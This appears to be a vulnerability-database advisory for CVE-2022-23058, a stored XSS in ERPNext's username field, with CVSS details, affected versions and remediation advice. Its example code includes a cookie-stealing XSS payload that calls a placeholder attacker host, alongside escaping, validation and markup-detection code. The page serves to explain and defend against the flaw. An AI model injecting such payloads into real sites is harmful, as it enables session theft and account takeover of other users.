LOW · 3.5

CVE-2022-23058


Vulnerability Description

ERPNext versions v12.0.9 through v13.0.3 are affected by a stored cross-site scripting (XSS) vulnerability. A low-privileged user can save a malicious script in the 'username' field under 'my settings'; because the stored value is later rendered into pages viewed by other users without adequate escaping, the script executes in their browsers, which can lead to full account takeover.
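The bug pattern behind this class of issue, as an added illustration (not Frappe/ERPNext source code): a profile field is concatenated into HTML unescaped, beside the escaped form, a server-side allow-list for the username, and an audit pass over stored user records of the kind you would run after upgrading. The render functions, the allow-list rule, the record field names and the sample rows are all assumptions constructed for this example; the payload's callback host is a placeholder.

```python
"""
Illustrative stored-XSS example for a 'username' profile field
(CVE-2022-23058 class of bug). Added example code, not Frappe/ERPNext
source: render functions, validator, record shape and sample rows are
hypothetical and constructed here to show the bug pattern and a fix.
"""
import html
import re

# Constructed payload of the kind a low-privileged user could save as a
# username. The handler exfiltrates the viewer's cookie to an
# attacker-controlled host (placeholder domain).
PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'


def render_user_badge_vulnerable(username: str) -> str:
    """Vulnerable pattern: user-controlled text concatenated into HTML."""
    return '<span class="user-badge">' + username + '</span>'


def render_user_badge_safe(username: str) -> str:
    """Hardened pattern: HTML-escape before inserting into a text node."""
    return '<span class="user-badge">' + html.escape(username, quote=True) + '</span>'


# Conservative allow-list for a username (letters, digits, dot, underscore,
# hyphen). A hypothetical server-side rule, not Frappe's actual validator.
USERNAME_RE = re.compile(r'^[A-Za-z0-9._-]{1,64}$')


def validate_username(username: str) -> bool:
    """Reject anything that is not a plain allow-listed identifier."""
    return USERNAME_RE.fullmatch(username) is not None


# Heuristics for auditing already-stored values: an opening/closing tag,
# an inline event handler, or a javascript: URL.
SUSPICIOUS_RE = re.compile(r'<\s*/?\s*[a-z]|on[a-z]+\s*=|javascript\s*:', re.IGNORECASE)


def find_suspicious_usernames(records):
    """Return the ids of records whose username looks like injected markup."""
    return [rec["name"] for rec in records if SUSPICIOUS_RE.search(rec["username"] or "")]


# Constructed sample rows shaped like user documents (field names assumed).
SAMPLE_USERS = [
    {"name": "alice@example.com", "username": "alice"},
    {"name": "bob@example.com", "username": PAYLOAD},
    {"name": "carol@example.com", "username": "carol.s"},
    {"name": "dave@example.com", "username": 'x" onmouseover="alert(1)'},
]

if __name__ == "__main__":
    print(render_user_badge_vulnerable(PAYLOAD))
    print(render_user_badge_safe(PAYLOAD))
    print([u for u in SAMPLE_USERS if not validate_username(u["username"])])
    print(find_suspicious_usernames(SAMPLE_USERS))
```

Output encoding at render time is the fix that actually neutralizes the bug; the input allow-list is defence in depth, and the audit pass matters because input validation added in a patch does nothing to values that were stored before the upgrade.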

CVSS Score

3.5 (LOW)

CVSS v2 vector: AV:N/AC:M/Au:S/C:N/I:P/A:N
  Access Vector: NETWORK
  Access Complexity: MEDIUM
  Authentication: SINGLE
  Confidentiality: NONE
  Integrity: PARTIAL
  Availability: NONE

Note that this is a CVSS v2 score: the vector records only a partial integrity impact for an authenticated attacker, which does not reflect the account-takeover outcome in the description. Treat the LOW rating as a lower bound on practical impact rather than a reason to defer patching.

Affected Products

Vendor   Product   Versions
Frappe   Erpnext   >= 12.0.9, < 13.1.0

Related Weaknesses (CWE)

Stored XSS of this kind falls under CWE-79, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'); the stored (persistent) variant is the one where the injected markup is saved server-side and served to later viewers.

References

FAQ

What is CVE-2022-23058?

CVE-2022-23058 is a vulnerability with a CVSS score of 3.5 (LOW). ERPNext versions v12.0.9 through v13.0.3 are affected by a stored XSS vulnerability that allows low-privileged users to store malicious scripts in the 'username' field in 'my settings', which can lead to full account takeover.

How severe is CVE-2022-23058?

CVE-2022-23058 has been rated LOW with a CVSS v2 base score of 3.5/10. The vector requires a single authenticated account and scores only partial integrity impact, so the number understates the account-takeover outcome in the description. Review the CVSS metrics above for the detailed breakdown.

Is there a patch for CVE-2022-23058?

No vendor advisory links are recorded on this page. The affected-products range (>= 12.0.9, < 13.1.0) places ERPNext 13.1.0 and later outside the affected versions, so upgrading to a current 13.x release is the expected remediation. After upgrading, audit existing 'username' values for injected markup, since input validation added in a fix does not clean data that was stored before the upgrade. Affected products include: Frappe Erpnext.